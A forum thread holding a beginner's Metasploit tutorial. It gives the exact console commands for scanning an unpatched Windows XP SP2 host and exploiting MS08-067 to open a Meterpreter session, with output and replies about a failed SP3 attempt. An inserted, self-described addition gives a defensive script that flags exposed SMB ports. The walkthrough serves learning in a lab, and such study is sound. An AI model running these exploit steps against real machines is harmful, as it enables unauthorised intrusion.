introduction to metasploit
This tutorial will give a basic introduction to Metasploit.
In the process, we'll also exploit a machine and run Meterpreter on it.
Everything that needs to be typed in the console makes use of the code tag. Example:
Also, I assume you have some basic understanding of networking and Linux.
WARNING: it is illegal to access a machine in any way that you do not have permission to, and it might land you in jail. I am not responsible for the actions you take. You have been warned.
Now on to the actual guide.
Requirements:
BackTrack 4 final
non-patched Windows XP SP2 box
(confirmed that this does not work on XP SP3)
some patience
These are my IPs; make sure to change them to reflect your own settings.
attacker: 192.168.198.129
victim: 192.168.198.130
OK, first things first: make sure that Metasploit is updated.
Code:
/pentest/exploits/fasttrack/fast-track.py -i
1
2
Do an nmap scan to make sure there are some open ports (with hopefully vulnerable services).
Code:
nmap -v 192.168.198.130
Nmap is done scanning and showed me 3 open ports. (If yours says filtered on all ports, try turning off any firewall.)
These are ports 135, 139 and 445.
We're going to focus on port 445.
A quick search on Google shows us that port 445 is commonly used for SMB.
Start up Metasploit.
When it's done loading,
Code:
show exploits windows
We need an exploit for SMB, so we need to choose one from the smb folder. I used the ms08_067_netapi exploit.
Code:
use windows/smb/ms08_067_netapi
Notice that after we typed this, the prompt changed from msf > to msf exploit(ms08_067_netapi) >
Great, so now we have an exploit, but what next?
An exploit is useless without a payload, so
This will give us a list of payloads compatible with the exploit.
We're going to use a Meterpreter payload for this tutorial.
Code:
set payload windows/meterpreter/bind_tcp
Now to configure it all.
Code:
info
set target 3
set rhost 192.168.198.130
target is which Windows version and service pack our victim is running (in our case XP SP2),
though you could also leave it how it is.
rhost is the IP of the victim.
Everything else can be left at default.
If the payload were a reverse TCP one, we would also need to set lhost;
lhost is the attacker's IP.
This is what we (should) get:
Quote:
[*] Started bind handler
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.198.129:60087 -> 192.168.198.130:4444
meterpreter >
Great! We're in!
Let's see what commands we have at our disposal.
Under what username is Meterpreter running?
What processes are running?
And so we could go on and on about what we can do with Meterpreter, but that is outside the scope of this tutorial.
Hope this guide has been useful to someone, somewhere. :)
For a more in-depth guide to what Metasploit can do, check this link:
Metasploit Unleashed - Mastering the Framework
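A defender-side counterpart to the nmap step in the guide above, added here as an example and not part of the original post: a Python script that parses nmap's normal output (both the older "Interesting ports on" header and the newer "Nmap scan report for" header) and reports, per host, the state of the three ports the guide's scan found (135, 139, 445). It distinguishes open from filtered, so the "all ports filtered, firewall on" case the author mentions is reported as such rather than as "not exposed". The sample scan output is constructed: the first host mirrors the guide's result for 192.168.198.130, the second is a made-up host behind a host firewall.

```python
import re

# The three ports the guide's scan found on the XP box: 135 (MSRPC endpoint
# mapper), 139 (NetBIOS session service) and 445 (SMB over TCP). The Server
# service that MS08-067 affects is reached through these.
SMB_PORTS = {135, 139, 445}

# Constructed sample of `nmap -v` normal output (not a real capture). The first
# host mirrors the guide's result; the second is a made-up host whose firewall
# filters the SMB ports, the case the author mentions.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-01 12:00 UTC
Interesting ports on 192.168.198.130:
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:00:00:01 (VMware)

Nmap scan report for 192.168.198.131
Host is up (0.00042s latency).
Not shown: 998 closed ports
PORT    STATE    SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Nmap done: 2 IP addresses (2 hosts up) scanned in 1.23 seconds
"""

# Per-host header, old style ("Interesting ports on X:") and new style
# ("Nmap scan report for X"); a trailing colon is stripped afterwards.
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for)\s+(\S+)")
# A port table row, e.g. "445/tcp open  microsoft-ds"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_nmap(text):
    """Return {host: [(port, proto, state, service), ...]} from nmap normal output."""
    hosts = {}
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(1).rstrip(":")
            hosts.setdefault(current, [])
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current].append((int(port), proto, state, service))
    return hosts


def smb_exposure(hosts):
    """Classify each scanned host by the state of its SMB-related TCP ports."""
    report = {}
    for host, ports in hosts.items():
        smb = [(p, s) for p, proto, s, _ in ports if proto == "tcp" and p in SMB_PORTS]
        open_ports = sorted(p for p, s in smb if s == "open")
        filtered = sorted(p for p, s in smb if s == "filtered")
        if open_ports:
            verdict = "SMB exposed: patch and restrict access"
        elif filtered:
            verdict = "SMB filtered: host firewall is probably on"
        else:
            verdict = "no SMB ports seen"
        report[host] = {"open": open_ports, "filtered": filtered, "verdict": verdict}
    return report


if __name__ == "__main__":
    for host, info in smb_exposure(parse_nmap(SAMPLE_NMAP_OUTPUT)).items():
        print(f"{host}: open={info['open']} filtered={info['filtered']} -> {info['verdict']}")
```

Feed it the saved output of a scan of your own network (`nmap -v <range> > scan.txt`, then `parse_nmap(open("scan.txt").read())`) to get a quick list of hosts that still answer on 445 from wherever the scan ran; a host that shows as "filtered" has not been verified as patched, only as shielded by a firewall.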
Re: introduction to metasploit
Nice one, _EcKo
Thank you.
If anyone wants to learn more about Metasploit, read here: Metasploit Unleashed - Mastering the Framework
Re: introduction to metasploit
Very good.
Thanks for sharing.
Re: introduction to metasploit
Good post, thanks! I'll have to try this out when I get back.
Re: introduction to metasploit
First of all: thanks!
I have a little question... I used the option "set target 0" too, for an automatic test of the 'version' etc., but this is the result:
Code:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
The firewall is off and the antivirus too... I am using VBox.
Maybe the system is patched against this kind of exploit?
In this case, is it possible to do something more with this exploit, or can I consider this a closed way?
Thanks (and sorry for my strange English :rolleyes:)
Re: introduction to metasploit
Quote: Originally Posted by reahel
First of all: thanks!
I have a little question... I used the option "set target 0" too, for an automatic test of the 'version' etc., but this is the result:
Code:
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
The firewall is off and the antivirus too... I am using VBox.
Maybe the system is patched against this kind of exploit?
In this case, is it possible to do something more with this exploit, or can I consider this a closed way?
Thanks (and sorry for my strange English :rolleyes:)
Your system is probably already patched against the MS08-067 vulnerability. It was published in Oct. 2008; here's the link.
Re: introduction to metasploit
Here is a lot of information on Metasploit from the folks at Offensive Security :D Metasploit Unleashed - Mastering the Framework. Edit: Whoops, didn't see Linus1907 already posted it.
I did a 45-minute presentation on that Metasploit Unleashed page and did most of the things on that page.
Re: introduction to metasploit
...nothing to do... for 'my' version of XP.
But I am beginning to understand how Metasploit works... and I am happy about this.
Thanks! The link is great! And this community is really active!
Re: introduction to metasploit
Quote: Originally Posted by Mr-Protocol
Here is a lot of information on Metasploit from the folks at Offensive Security :D
Metasploit Unleashed - Mastering the Framework. Edit: Whoops, didn't see Linus1907 already posted it.
I did a 45-minute presentation on that Metasploit Unleashed page and did most of the things on that page.
Definitely worth mentioning. The Metasploit Unleashed course took me from maybesploit to megasploit in just 2 days.
Good job as well, _EcKo. Thanks.
Re: introduction to metasploit
I wonder if this'll work with XP SP3.
I'll definitely try it tonight.
Cheers.